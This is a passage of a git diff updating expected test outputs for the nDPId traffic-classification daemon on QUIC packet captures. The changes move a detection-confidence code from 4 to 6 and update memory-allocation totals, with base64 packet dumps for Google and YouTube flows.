-00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}} +00706{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google.com"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388060251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1592388060251,"pkt":"AAAAAAAAAAoAtmi7CABFAAA6AABAADsR1dxId9kdM3gUygG7wFkAJsU\/COg8d72PiRX5AdVtByTcf3A7ZqGOSkABJDYBAAYA"} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"thread_ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1592388060203,"flow_last_seen":1592388060251,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1380,"flow_avg_l4_payload_len":690,"midstream":0,"thread_ts_msec":1592388060251,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"quic_q43.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":1380,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1592388060251} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2247 chars diff --git a/test/results/quic_q46.pcap.out b/test/results/quic_q46.pcap.out index 7abb56a7d..c64c58bf5 100644 --- a/test/results/quic_q46.pcap.out +++ b/test/results/quic_q46.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1559632338055} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02247{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1559632338055,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1559632338055,"pkt":"AAAAAAAAAAAA4JDHCABFAAVic3hAAD8RmymsHSrsmRS3y5WUAbsFTk\/Qw1EwNDZQ6s\/m5wbfJy0AAAAEYNpYkp9oOdCGDvxYpAEEAAQAQ0hMTxoAAABQQUQAtgEAAFNOSQDFAQAAU1RLAP0BAABTTk8AMQIAAFZFUgA1AgAAQ0NTAEUCAABOT05DZQIAAEFFQURpAgAAVUFJRJQCAABTQ0lEpAIAAFRDSUSoAgAAUERNRKwCAABTTUhMsAIAAElDU0y0AgAATk9OUNQCAABQVUJT9AIAAE1JRFP4AgAAU0NMU\/wCAABLRVhTAAMAAFhMQ1QIAwAAQ1NDVAgDAABDT1BUDAMAAENDUlQcAwAASVJUVCADAABDRkNXJAMAAFNGQ1coAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tcGxheS5nb29nbGUuY29tTF5QaJRKaTNoSpJ2byVw\/n2jR\/SXiDAUaxRXCyDlaH13oYGRvmmLh5UfnwV+qkP8rBLql6P0cVhpCGDXJyou7qdg+dnByWJAkTSY+CUh8yfYOYMRdIFYIeO6ZKEQGzvhOWxsGdkkbQk0joNdUTA0NgHogWCSkhrofu2AhqIVgpFc9hnRMDAwMDAwMDAg1WpdFEihkws6cxoJh1cnEudv5EFFU0dDaHJvbWUvNzQuMC4zNzI5LjE1NyBBbmRyb2lkIDguMC4wOyBCTkQtTDIxqZ2LiTEPPlI5bOtRl2sWwwAAAABYNTA5AQAAAB4AAAA+5+ExAY9KZ43WAi5gboQGad\/XZY9NgsCyvAvlen24imYZuixux5QJ4+eD6hkpSGJfDn9+XBFyJ61rFG0t2MkrZAAAAAEAAABDMjU1M\/in8FpHdkpOU1RQM\/in8FpHdkpn+K3FgBXj\/3u4AAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559632338083,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1559632338083,"pkt":"AAAAAAAAAAAA4JDHCABFAABAAABAADQRHsSZFLfLrB0q7AG7lZQALNrDw1EwNDYF6s\/m5wbfJy0AAAAFbGsm7eq1vsQbMX0cQAQkIAMA"} 02257{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559632338308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1559632338308,"pkt":"AAAAAAAAAAAA4JDHCABFgAViAABAADURGCKZFLfLrB0q7AG7lZQFTiJnQAtQvT4L41LYkTDHbWnvY3Q7xNlk7lPAOJoU7qSEDNxr\/eXA5HdvGouKSa5JA+EfJXVcrF5I8JeTQOik+2bWgM1nMhrT0SQGJgoDC3vmiFQsGJJjkMZScnfQIf1wQxM8bMy1rX9IG5gNouAF2UDgTxNWxp8Z+kpanynzPm9Aewt1Q8YQSGSHVmFR2wS\/qJorTHWD8seoBDxiXr\/Jrzhp+T4G7aWy+PK4peW1lunM5ZwayH+2G6AF72mr+9NShIq31T+R\/i7G00e0d8lC08arFgrP7xbHltzNsevJw7TO7heoxYjLOdwd79cQPJBHGN6cAkZED6B76kDGTUdX1AYSpun6LhwRHlxgVuFQtfE7y\/DnLBUYzAcWntPYNYvGghUNITCLh8lnobrCJOOpgpG31oH5+kuwGIUSXbKA+01pRlfgd5gXolZKhK3pWOerj\/frjDS+2g8vClgYRT1+lV7rb2y\/Iik5yjyOhRlKWs5VLZ7VCWYVKqICcZsTvon\/NMVVMYb6HJJ32Yz2ORvo8ebpxTje4yqrxC+qapfY5RwYmEaDmI1L2w04UoqZ0dJ1NSSxDm6HXMu+ZshF6SujBNEG42mGdRf6IaSoNlxzMkSyrtk+YmufaVAWXNamgtbe+ZtSIpyI7W+63DDWITJezj4w9w00cUFEntoLNlOB+zElDxYScTOE3CpSs44g2fcVw+4rvMHfwuxPeTdHzp4MAsePKq+zngj\/90JBFE\/tDfTVYbaRpu5lmM3pDSvtX0fT5TvOH843VTAPlB2fm8MHtEMU7PIrg8lvLI5kYBqaI59yOALOtxEFcXeKMhTylktz05RjIrZg6ifgDckMo48nJYsJtSpscdyoK9zfGzj4NaovMFvwwWNIopaYds\/P+xBZkC90KYsz06jFDLqNdcZXDkHaPFJXZAxXx9set1Fg3lj6r\/AobA8N7sLKydAgxC\/rtEWCBX5wbSuX8kpFOJgGKfLdk0JYmC7zbnJyfyy+C6ukhZHN0cU81AFqszDmIIshOZAY4iWz5aWIzL1ctZtibQ5iLAcoUfb250TuivT+FGWq8x3DLfXpYTdXUgbMkK8lTQJuOYtFhD4fHRbg8qZIkwDODXwLSUcnqUn+Q2uzh8PtHzNYdam5Obh2M8GgLW8ukG2P6sOp8CokFzXYzFsiExtyxRsQxvskOlQmLevtIDnsShgWKCRO7UN+uhRGaYGLmSq2\/5t1JyMiF0cem8I\/nOK0mRwXY7N+ECcoaRDXyTKJR\/4pe4u8s4tPdTtCzoa7o8ItJAgr6FkTuYLEo2hwMyPm4hV38utdskBYyUhI6Vz27vbgYAi5nzlUMaKyr3bk72PVb2h6cE+5pbWp8t27oXh4ceZgCJ1CqxGsEI5zHMEsBX6U\/74OCgAAVZMzKh0lFrwDdkIuV+i7biu6I3DoZxr1X50m6VKkaA+qvAjpG+BPOMuRH3\/5\/vE6iwiiUVaV8HIEZpVud+gx9Rzu573VwQ87CJfVs7RmgLI88d6qzIEQAYp5JQrr2lJf1+r4xl60u3ZAa+E+ox2R3gSbE67e9uWolVz8QS9Ep2IK7cfXKJOfNxu70MQcIVFRson71WUtcVpILsaqgb9rATvfzoNmtskVITRoIpqD+mi2ZJvPx6FmM5uP7YQiAppyWykt6puGjRFKGSfbt2gGFGLSdxE20Jo0zgDKZvUFlb4u07xu5j8JVjk7HreBYMQixh6ugURELWsT7GFnQi1VQvh64jRAmDcuARkYMw2228CWbF39WsM9a4SaEoLaEPaqo3lcdKo0+Sgn7WsqvH1w"} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"thread_ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"thread_ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":20401,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1559632338367} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870067 bytes -~~ total memory freed........: 5870067 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6003701 bytes +~~ total memory freed........: 6003701 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2262 chars diff --git a/test/results/quic_q46_b.pcap.out b/test/results/quic_q46_b.pcap.out index 05afd3b8d..abc4a56c0 100644 --- a/test/results/quic_q46_b.pcap.out +++ b/test/results/quic_q46_b.pcap.out @@ -2,10 +2,10 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1561708873328} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561708873328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"thread_ts_msec":1561708873328,"pkt":"AAAAAAAAAAIAGNwmCABFAAViWnxAAD0R9xCsG0XYbueGI7HaAbsFTnXjw1EwNDZQ0aOrrPYcbNEAAAABZ49NM0tlJ\/QWOEX0oAEEAENITE8ZAAAAUEFEAOsBAABTTkkA\/QEAAFNUSwAzAgAAVkVSADcCAABDQ1MARwIAAE5PTkNnAgAAQUVBRGsCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXVwbG9hZC55b3V0dWJlLmNvbXgDMRgyNKjZnbeNIexiej4o7qx+V929kxA9dDLsNr49+J4e7Bxt\/tr6btXxr2ajG15fa3Ruq1EwNDYB6IFgkpIa6H7tgIaiFYKRXRXJTjAwMDAwMDAw6FYYVlvjBaujP6e+o70a5ZenNg5BRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0Lzc2LjAuMzgwOS4w1Y68K3sgywV7JQccxBohdQAAAABYNTA5AQAAAB4AAACrpFnJA5r+YO5RcQGpd1l4yFvK+8akrX8Ivr05rqkgauMBpMQ6cwQFDJS6sLs7Du5\/2eIOY7vG9b+CMCy0OZxEZAAAAAEAAABDMjU1jtxYjsj\/DkhJRldhQUtEM47cWI7I\/w5IZ\/itxYAV4\/+8OAwAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561708873357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":44,"thread_ts_msec":1561708873357,"pkt":"AAAAAAAAAAIAGNwmCABFAABAAABAADgRW69u54YjrBtF2AG7sdoALCZ3w1EwNDYF0aOrrPYcbNEAAAABKUO4TMFStZdbdRt4QAEkVwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 02338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1561708873447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"thread_ts_msec":1561708873447,"pkt":"AAAAAAAAAAIAGNwmCABFAAViAABAADgRVo1u54YjrBtF2AG7sdoFTr6M01EwNDYF0aOrrPYcbNEAAAAC\/8YjGS48qVhChWSun\/F\/0tw83QKJDLWjBYJA09IzRzwLQnCpg9NyEHpzaflUNehkOBavOBhu3YQm9xnHynBS8TFlxf6b7SbJ212GvxrQorob1FGVAX8oQ4qlKdNcH9KmGH8FQqiWXAUdP4wIv8bxJlPu0eWjvrQVEV4+WIaZItIH+aOUaSN9\/ilrA9RvBf\/Eg0uWYctKOmpFEGA9LEKr3HlpKp21MHHYkSpIqfP4A7ajmPfUk0qEmleXgrgJc3ZuVwkOUh+lp\/0eDnUOVGnw0Bef\/nRJzAy9BZYUOHKfKJigrc1SrncXcXGesF5G8MJfo5lQQeKDSwoFevbeXZPRaK1FV8AI13mn1U7+k+RqYwMfqTzjcryU\/s5BA04mts+Ch050+b0vPi6EOfeOA1CLxv\/tk6KsNDiigEk01rPLNm\/hEnaVJMANIzUHvUP4jg3PU04wvG3u8GEaxXwy79Kn6368OsQ8hdAqoLyQpQyhi1ABBqvxZWZGsUTcum\/BfVuIRpmo5YvcWIiYFY\/Q6OXLR9R2vVMjhnQvgbZY+rzI0fcZRdscepkhRGzz77vGIKYhgUxMxPqTprvkoXFsDJnTqnp4n2GwWBLIb0OyfRf\/7VRBKuLzhYfdO+kGKah6INzDv1vEkf39Q6kBHznQt9lH735l+OscDivp0nZu4MdQyN7vfOJNp9+jgtg8n2ANvCzvvW+7oAPTELH+3+cxxBeh66ejadW2+\/yfNqGNsYWunD\/XCKd4D2V+lhoYnV56+qwSLgUXXWB2mY\/jm0ycFhQ\/Q6nqSn\/I2aBJISRolyEFPYh65rNrttlVuSy4cI8laG8Su6VBG5Uuo4K9zFSe74fhMvn\/3xxSa9X04Mry4juPeEmANXZBAppqqM0xlJabIn2HLD847OZiYuNRgulowJTRYa0BeXeFFYwg5asYjFOcmIPelC6rywwM4C200+37pJCuqYhl7VRwKcsiCZz5pFD6vxpCnxBkjn70ZSRCzczW97N+mAXR4TjhOAdfEQuhrY7Y+WOOlG0I5lw5fpu2\/+2zMe3NZEICyLuE+yMXBwxKksv83s\/2DTmSfmADa1Lt+OXCdJZp8e\/fI5MOWyzXREHAWA0p1Xxf0J